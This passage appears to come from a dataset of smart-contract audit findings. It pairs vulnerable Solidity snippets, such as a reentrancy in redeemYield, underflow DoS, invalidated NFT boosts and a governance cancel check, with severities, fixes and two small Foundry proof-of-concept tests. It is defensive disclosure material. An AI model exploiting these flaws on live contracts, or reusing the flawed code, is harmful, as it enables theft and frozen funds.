data)));\\n// Add the line below\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\nчThe caller who owns the signature, can distribute the prizes for a new distribution implementation using the same signature which was created for an old implementation. The `organizer` must create a new signature if there is a new implementation for the same `contestId`. The authorized signature is for one distribution implementation not for the future distribution implementations.\\nTools used\\nManual reviewч```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n -Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract foreverчmediumчThe vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\nчIt is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.чThis vulnerability is marked as High severity because a blacklisted `STADIUM_ADDRESS` would lead to funds being locked in the Proxy address permanently. Funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds due to the revert.ч```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n -`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflowчlowч`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.чExplicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\nч`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\nч```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n -Prevent creating an investor record associated with no addressчlowч`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\nчIn `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\nчAn investor record can be created without any associated address. This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`ч```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n -`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflowчlowч`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.чExplicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n \"RateLimit: Redemption exceeds rate limit\"\\n );\\n}\\n```\\nч`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.ч```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n);\\n```\\n -Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg eventчlowч`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n \"OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1\"\\n);\\n```\\n\\nIn the event of a USDC depeg (especially if the depeg is sustained), `BUIDLRedeemer` should return greater than a 1:1 ratio since 1 USDC would not be worth $1, hence 1 BUIDL != 1 USDC meaning the value of the protocol's BUIDL is worth more USDC. However `BUIDLReceiver` does not do this, it only ever returns 1:1.чTo prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and if so, calculate the amount of USDC it should receive in exchange for its BUIDL. If it is short-changed it would either have to revert preventing redemptions or allow the redemption while saving the short-changed amount to storage then implement an off-chain process with BlackRock to receive the short-changed amount.\\nAlternatively the protocol may simply accept this as a risk to the protocol that it will be willingly short-changed during a USDC depeg in order to allow redemptions to continue.чIn the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.ч```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n \"OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1\"\\n);\\n```\\n -Consider allowing `ROUSG::burn` to burn dust amountsчlowч`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.чConsider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.чч```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n -`Goldilend.lock()` will always revertчhighчIn `lock()`, it calls `_refreshiBGT()` before pulling `iBGT` from the user and will revert while calling `iBGTVault(ibgtVault).stake()`.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\nч`_refreshiBGT()` should be called after pulling funds from the user.чUsers can't lock `iBGT` as `lock()` always reverts.ч```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n -Wrong `PoolSize` increment in `Goldilend.repay()`чhighчWhen a user repays his loan using `repay()`, it increases `poolSize` with the repaid interest. During the increment, it uses the wrong amount.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest` because the user repaid `interest` only.ч`poolSize` should be updated using `interest`.ч`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.ч```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n -Users can extend an expired boost using invalidated NFTs.чhighчIn `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\nчWhenever users extend their boosts, their NFTs should be evaluated again.чMalicious users can use invalidated NFTs to extend their boosts forever.ч```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n -Team members can't unstake the initial allocation forever.чhighчWhen users call `unstake()`, it calculates the vested amount using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members and they can't unstake forever. Furthermore, in `stake()`, it just prevents seed investors, not team members. So if team members have staked additionally, they can't unstake also.ч`_vestingCheck` should use the same logic as initial investors for team mates.чTeam members can't unstake forever.ч```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n -In `GovLocks`, it shouldn't use a `deposits` mappingчhighчIn `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.чWe don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.чUsers wouldn't be able to withdraw `LOCKS` with `govLOCKS`.ч```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n -Some functions of `Goldilend` will revert forever.чhighч`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they doesn't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` has all `ibgt` of `Goldilend`, they should withdraw from `ibgtVault` first.ч3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\nч`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.ч```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n -`Goldigovernor._getProposalState()` shouldn't use `totalSupply`чmediumчIn `_getProposalState()`, it uses `Goldiswap(goldiswap).totalSupply()` during the comparison.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nAs `totalSupply` is increasing in real time, a `Queued` proposal might be changed to `Defeated` one unexpectedly due to the increased supply.чWe should introduce another mechanism for the quorum check rather than using `totalSupply`.чA proposal state might be changed unexpectedly.ч```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n -In `Goldivault.redeemYield()`, users can redeem more yield tokens using reentrancyчmediumчPossible reentrancy in `Goldivault.redeemYield()` if `yieldToken` has a `beforeTokenTransfer` hook.\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100 and the user has 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\nThen `yt.totalSupply` will be changed to 90 and it will transfer `100 * 10 / 100 = 10 yieldToken` to the user.\\nInside the `beforeTokenTransfer` hook, the user calls `redeemYield()` again with 10 yt.\\nAs `yieldToken.balance` is still 100, he will receive `100 * 10 / 90 = 11 yieldToken`.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\nчWe should add a `nonReentrant` modifier to `redeemYield()`.чMalicious users can steal `yieldToken` using `redeemYield()`.ч```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n -Wrong validation in `Goldigovernor.cancel()`чmediumчIn `Goldigovernor.cancel()`, the proposer should have fewer votes than `proposalThreshold` to cancel his proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\nчIt should be modified like this.\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert 